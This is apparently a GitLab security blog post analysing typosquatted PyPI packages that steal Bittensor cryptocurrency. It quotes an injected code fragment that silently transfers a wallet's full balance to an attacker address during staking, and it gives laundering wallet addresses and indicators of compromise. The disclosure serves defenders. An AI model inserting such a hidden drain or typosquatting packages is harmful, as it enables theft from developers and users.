is now in public beta!
Published on: August 6, 2025
5 min read
GitLab uncovers Bittensor theft campaign via PyPI
GitLab's Vulnerability Research team identified a supply chain attack campaign using typosquatted PyPI packages to steal cryptocurrency from Bittensor wallets by hijacking staking operations.
GitLab's Vulnerability Research team has identified a sophisticated cryptocurrency theft campaign targeting the Bittensor ecosystem through typosquatted Python packages on PyPI. Our investigation began when GitLab's automated package monitoring system flagged suspicious activity related to popular Bittensor packages. We discovered multiple typosquatted variations of legitimate Bittensor packages, each designed to steal cryptocurrency from unsuspecting developers and users. The identified malicious packages were all published within a 25-minute window on August 6, 2025:
[email protected](02:52 UTC) -[email protected](02:59 UTC) -[email protected](03:02 UTC) -[email protected](03:15 UTC) -[email protected](03:16 UTC) All packages were designed to mimic the legitimatebittensorandbittensor-clipackages, which are core components of the Bittensor decentralized AI network.
Technical analysis: How the theft occurs
Our analysis revealed a carefully crafted attack vector where the attackers modified legitimate staking functionality to steal funds. The malicious packages contain a hijacked version of the stake_extrinsic function in bittensor_cli/src/commands/stake/add.py.
Where users expect a normal staking operation, the attackers inserted malicious code at line 275 that silently diverts all funds to their wallet:
subtensor=subtensor,
wallet=wallet,
destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
amount=amount,
transfer_all=True,
prompt=False
)
This malicious injection completely subverts the staking process:
- Silent execution: Uses
prompt=Falseto bypass user confirmation - Complete wallet drain: Setstransfer_all=Trueto steal all available funds, not just the staking amount - Hardcoded destination: Routes all funds to the attacker's wallet address - Hidden in plain sight: Executes during what appears to be a normal staking operation The attack is particularly insidious as users believe they're staking tokens to earn rewards, but instead, the modified function empties their entire wallet.
Why target staking functionality?
The attackers appear to have specifically targeted staking operations for calculated reasons. In blockchain networks like Bittensor, staking is when users lock up their cryptocurrency tokens to support network operations, earning rewards in return, similar to earning interest on a deposit. This makes staking an ideal attack vector:
- High-value targets: Users who stake typically hold substantial cryptocurrency holdings, making them lucrative victims. 2. Required wallet access: Staking operations require users to unlock their wallets and provide authentication—giving the malicious code exactly what it needs to drain funds. 3. Expected network activity: Since staking naturally involves blockchain transactions, the additional malicious transfer doesn't immediately raise suspicions. 4. Routine operations: Experienced users stake regularly, creating familiarity that breeds complacency and reduces scrutiny. 5. Delayed detection: Users might initially assume any balance changes are normal staking fees or temporary holds, delaying discovery of the theft. By hiding malicious code within legitimate-looking staking functionality, the attackers exploited both the technical requirements and user psychology of routine blockchain operations.
Following the money
GitLab's Vulnerability Research team traced the cryptocurrency flows to understand the full scope of this operation. The primary destination wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR served as a central collection point before funds were distributed through a network of intermediary wallets.
The money laundering network
Our analysis revealed a multi-hop laundering scheme:
- Primary collection: Stolen funds initially arrive at
5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR2. Distribution network: Funds are quickly moved to intermediate wallets including:5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP15GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs65CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
- Final consolidation: All paths eventually converge at
5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu4. Cash-out endpoint: Final destination appears to be5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ
The typosquatting strategy
The attackers employed a typosquatting strategy that exploits common typing errors and package naming conventions:
- Missing characters:
bitensorinstead ofbittensor(missing 't') - Truncation:bittensoinstead ofbittensor(missing final 'r') - Version mimicking: All packages used version numbers (9.9.4,9.9.5) that closely match legitimate package versions This approach maximizes the chance of installation through developer typos duringpip installcommands and copy-paste errors from documentation.
Looking ahead: The future of supply chain security
GitLab continues to invest in proactive security research to identify and neutralize threats before they impact our community. Our automated detection system works around the clock to protect the software supply chain that powers modern development. The swift detection and analysis of this attack demonstrate the value of proactive security measures in combating sophisticated threats. By sharing our findings, we aim to strengthen the entire ecosystem's resilience against future attacks.
Indicators of compromise
| IOC | Description |
|---|---|
pkg:pypi/[email protected] |
Malicious PyPI package |
pkg:pypi/[email protected] |
Malicious PyPI package |
pkg:pypi/[email protected] |
Malicious PyPI package |
pkg:pypi/[email protected] |
Malicious PyPI package |
pkg:pypi/[email protected] |
Malicious PyPI package |
5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR |
Bittensor (TAO) wallet address for receiving stolen funds |
Timeline
| Date & Time | Action |
|---|---|
| 2025-08-06T06:33 | Initial analysis of suspicious packages reported by automated monitoring system |
| 2025-08-06T09:42 | Reported [email protected] to PyPi.org |
| 2025-08-06T09:46 | Reported [email protected] to PyPi.org |
| 2025-08-06T09:47 | Reported [email protected] to PyPi.org |
| 2025-08-06T09:49 | Reported [email protected] to PyPi.org |
| 2025-08-06T09:51 | Reported [email protected] to PyPi.org |
| 2025-08-06T15:26 | PyPi.org removed [email protected] |
| 2025-08-06T15:27 | PyPi.org removed [email protected] |
| 2025-08-06T15:27 | PyPi.org removed [email protected] |
| 2025-08-06T15:28 | PyPi.org removed [email protected] |
| 2025-08-06T15:28 | PyPi.org removed [email protected] |